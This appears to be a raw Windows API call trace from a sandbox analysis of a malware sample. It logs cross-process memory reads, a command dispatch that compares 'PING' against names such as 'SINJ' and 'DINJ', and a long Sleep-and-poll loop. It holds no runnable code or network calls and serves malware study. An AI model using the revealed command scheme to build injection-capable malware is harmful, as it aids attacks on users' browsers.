	[0246.996] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x26b8780
	[0246.996] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225eb8
	[0246.996] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0246.996] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225fc8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225fc8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0246.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225fc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0246.996] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffd80
	[0246.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225fc8, cbMultiByte=-1, lpWideCharStr=0x22ffd80, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0246.996] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x26b8780, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x26b8780, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0246.997] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x225eb8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225eb8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0246.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225eb8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0246.997] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bfe78
	[0246.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225eb8, cbMultiByte=-1, lpWideCharStr=0x27bfe78, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0246.997] SetEvent (hEvent=0x474) returned 1
	[0246.997] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225fc8) returned 1
	[0246.997] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8780) returned 1
	[0246.997] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225eb8) returned 1
	[0246.997] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bfdb0
	[0246.997] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0246.997] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0246.997] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0246.997] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0246.997] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0246.997] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff900
	[0246.997] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x27bfe28, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xdd0) returned 0x634
	[0246.998] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf680
	[0246.998] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.998] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.998] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.998] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.998] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.998] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0246.998] Sleep (dwMilliseconds=0xbb8) 
	[0247.011] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.011] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.011] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.011] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.011] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.011] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.011] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0247.012] Sleep (dwMilliseconds=0xbb8) 
	[0247.029] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.029] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.029] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.029] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.029] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.029] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.029] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0247.029] Sleep (dwMilliseconds=0xbb8) 
	[0247.042] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.042] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.042] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.042] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.043] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.043] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.043] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0247.043] Sleep (dwMilliseconds=0xbb8) 
	[0247.058] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.058] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.058] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.058] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.058] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.058] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.058] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9c8) returned 1
	[0247.058] Sleep (dwMilliseconds=0xbb8) 
	[0247.073] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.073] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.073] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.073] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.074] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.074] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.074] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9c8) returned 1
	[0247.074] Sleep (dwMilliseconds=0xbb8) 
	[0247.089] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.089] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.089] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.089] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.089] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.089] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.089] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9c8) returned 1
	[0247.089] Sleep (dwMilliseconds=0xbb8) 
	[0247.105] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.105] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.105] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.105] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.105] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.105] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.105] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9c8) returned 1
	[0247.105] Sleep (dwMilliseconds=0xbb8) 
	[0247.122] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.122] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.122] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.122] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.122] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.122] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.122] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9c8) returned 1
	[0247.122] Sleep (dwMilliseconds=0xbb8) 
	[0247.136] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.136] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.136] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.136] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.136] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.136] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.137] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9c8) returned 1
	[0247.137] Sleep (dwMilliseconds=0xbb8) 
	[0247.152] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.152] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.152] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.152] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.152] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.152] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.152] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9c8) returned 1
	[0247.152] Sleep (dwMilliseconds=0xbb8) 
	[0247.214] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.214] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.214] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.214] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.214] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.214] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.214] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9c8) returned 1
	[0247.214] Sleep (dwMilliseconds=0xbb8) 
	[0247.230] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.230] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.230] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.230] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.230] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.230] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.230] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9c8) returned 1
	[0247.230] Sleep (dwMilliseconds=0xbb8) 
	[0247.245] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.245] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.245] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.245] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.245] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.245] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.245] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9c8) returned 1
	[0247.245] Sleep (dwMilliseconds=0xbb8) 
	[0247.261] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.261] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.261] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.261] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.261] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.261] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.261] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9c8) returned 1
	[0247.261] Sleep (dwMilliseconds=0xbb8) 
	[0247.276] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.276] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.276] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.276] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.276] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.276] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.276] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9c8) returned 1
	[0247.276] Sleep (dwMilliseconds=0xbb8) 
	[0247.292] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.292] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.292] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.292] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.292] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.292] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.292] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27beff0) returned 1
	[0247.292] Sleep (dwMilliseconds=0xbb8) 
	[0247.307] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.308] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.308] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.308] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.308] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.308] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.308] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfdd8) returned 1
	[0247.308] Sleep (dwMilliseconds=0xbb8) 
	[0247.323] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.323] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.323] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.323] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.323] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.323] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.323] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfdd8) returned 1
	[0247.323] Sleep (dwMilliseconds=0xbb8) 
	[0247.339] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.339] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.339] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.339] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.339] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.339] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.339] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfdd8) returned 1
	[0247.339] Sleep (dwMilliseconds=0xbb8) 
	[0247.354] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.354] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.354] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.354] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.354] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.354] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.354] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfdd8) returned 1
	[0247.355] Sleep (dwMilliseconds=0xbb8) 
	[0247.370] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.370] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.371] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.371] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.371] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.371] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.371] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfdd8) returned 1
	[0247.371] Sleep (dwMilliseconds=0xbb8) 
	[0247.386] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.386] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.386] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.386] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.386] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.386] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.386] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfdd8) returned 1
	[0247.386] Sleep (dwMilliseconds=0xbb8) 
	[0247.401] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.401] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.401] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.401] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.401] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.401] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.401] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfdd8) returned 1
	[0247.401] Sleep (dwMilliseconds=0xbb8) 
	[0247.417] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.417] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.417] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.417] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.417] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.417] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.417] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfdd8) returned 1
	[0247.417] Sleep (dwMilliseconds=0xbb8) 
	[0247.433] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.433] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.433] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.433] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.433] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.433] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.433] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfdd8) returned 1
	[0247.433] Sleep (dwMilliseconds=0xbb8) 
	[0247.448] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.448] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.448] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.448] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.448] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.448] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.448] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfdd8) returned 1
	[0247.449] Sleep (dwMilliseconds=0xbb8) 
	[0247.464] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.464] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.464] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.464] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.464] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.464] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.464] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfdd8) returned 1
	[0247.464] Sleep (dwMilliseconds=0xbb8) 
	[0247.480] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.480] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.480] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.481] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.481] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.481] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.481] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfdd8) returned 1
	[0247.481] Sleep (dwMilliseconds=0xbb8) 
	[0247.495] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.495] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.495] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.495] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.495] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.495] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.495] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfdd8) returned 1
	[0247.495] Sleep (dwMilliseconds=0xbb8) 
	[0247.518] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0247.518] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0247.518] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0247.518] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0247.518] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0247.519] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0247.519] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfdd8) returned 1
	[0247.519] Sleep (dwMilliseconds=0xbb8) 
	[0247.526] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0247.526] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225fc8
	[0247.526] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x26b8780
	[0247.526] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225e30
	[0247.526] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0247.526] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225fc8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225fc8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0247.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225fc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0247.526] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e14e0
	[0247.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225fc8, cbMultiByte=-1, lpWideCharStr=0x27e14e0, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0247.526] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x26b8780, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x26b8780, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0247.526] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x225e30, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225e30*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0247.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0247.526] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bfba8
	[0247.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x27bfba8, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0247.527] SetEvent (hEvent=0x474) returned 1
	[0247.527] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225fc8) returned 1
	[0247.527] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8780) returned 1
	[0247.527] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225e30) returned 1
	[0247.527] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf9c8
	[0247.527] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
